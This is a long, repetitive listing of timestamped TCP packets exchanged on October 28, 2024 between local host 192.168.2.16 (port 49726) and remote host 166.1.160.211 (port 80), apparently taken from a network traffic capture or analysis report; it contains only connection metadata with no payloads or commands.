                                                                                                                                                              Oct 28, 2024 19:46:20.436705112 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.436724901 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.436774969 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.436980009 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.437012911 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.437047005 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.437067986 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.437081099 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.437114000 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.437124968 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.437141895 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.437175035 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.437180042 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.437211037 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.437242031 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.437261105 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.437275887 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.437310934 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.437315941 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.437827110 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.437860012 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.437865973 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.437908888 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.437942028 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.437949896 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.437977076 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.438010931 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.438020945 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.438045979 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.438076973 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.438105106 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.438112020 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.438139915 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.438157082 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.438597918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.438631058 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.438646078 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.438664913 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.438699007 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.438709021 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.438731909 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.438765049 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.438777924 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.438797951 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.438829899 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.438838005 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.487566948 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.487582922 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.487615108 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.487623930 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.487648964 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.487677097 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.487689972 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.487709999 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.487761021 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.488238096 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.488274097 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.488306999 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.488318920 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.488341093 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.488373041 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.488384962 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.488406897 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.488440037 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.488456964 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.488473892 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.488507032 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.488522053 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.488542080 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.488574982 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.488591909 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.488607883 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.488641977 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.488661051 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.488676071 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.488720894 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.489104033 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.489156008 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.489202023 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.489204884 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.489240885 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.489274025 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.489289045 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.489310026 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.489341974 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.489356041 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.489377022 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.489408970 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.489424944 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.489444971 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.489476919 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.489490032 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.489510059 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.489543915 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.489562988 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.489578962 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.489607096 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.489626884 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.490041018 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.490073919 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.490098000 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.490107059 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.490142107 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.490155935 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.490178108 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.490211964 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.490226984 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.490247011 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.490279913 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.490294933 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.536950111 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.537003994 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.537034035 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.537069082 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.537112951 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.537166119 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.537199974 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.537233114 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.537250996 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.537267923 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.537301064 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.537313938 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.537412882 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.537456036 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.537499905 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.537544966 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.537587881 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.537596941 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.537650108 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.537694931 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.537702084 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.537738085 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.537781000 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.537807941 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.537841082 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.537883997 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.537998915 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.538033962 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.538067102 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.538079977 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.538100958 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.538134098 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.538149118 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.538167000 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.538202047 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.538213968 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.538520098 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.538553953 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.538567066 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.538587093 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.538619041 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.538633108 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.538654089 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.538686037 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.538693905 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.538718939 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.538752079 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.538762093 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.538788080 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.538832903 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.539060116 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.539089918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.539123058 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.539132118 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.539158106 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.539191008 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.539210081 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.539225101 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.539258957 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.539269924 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.587145090 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.587172985 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.587198019 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.587205887 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.587239981 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.587251902 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.587275028 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.587308884 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.587323904 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.587357998 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.587402105 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.587686062 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.587719917 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.587769985 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.587830067 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.587881088 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.587913990 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.587924957 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.587948084 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.587975979 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.587997913 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.588013887 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.588047981 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.588066101 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.588079929 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.588114023 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.588123083 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.588146925 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.588182926 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.588200092 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.588222980 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.588267088 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.588629961 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.588665009 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.588699102 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.588712931 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.588732004 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.588782072 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.644143105 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.650237083 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.650285006 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.650310993 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.650341988 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.650398970 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.650448084 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.650492907 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.650511026 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.650527954 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.650546074 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.650553942 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.650589943 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.650804996 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.650831938 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.650851011 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.650866985 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.650871992 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.650882959 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.650903940 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.650919914 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.650922060 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.650939941 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.650949001 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.650959015 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.650985956 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.651549101 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.651590109 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.651607037 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.651623011 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.651623011 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.651640892 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.651659012 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.651660919 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.651676893 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.651690006 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.651693106 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.651710987 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.651715040 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.651726961 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.651745081 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.651746035 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.651760101 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.651778936 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.651788950 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.651814938 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.652479887 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.652498007 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.652514935 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.652530909 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.652540922 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.652546883 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.652565002 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.652571917 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.652582884 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.652599096 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.652611017 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.652616024 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.652641058 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.652642012 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.652659893 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.652677059 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.652686119 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.652693987 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.652718067 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.653423071 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.653439045 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.653454065 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.653466940 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.653475046 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.653491974 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.653501987 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.653508902 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.653526068 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.653532982 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.653543949 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.653558969 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.653568983 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.653575897 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.653594017 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.653601885 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.653611898 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.653629065 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.653634071 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.653646946 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.653671026 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.866086960 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.866122007 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.866146088 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.866157055 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.866214037 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.866667032 CET8049726166.1.160.211192.168.2.16
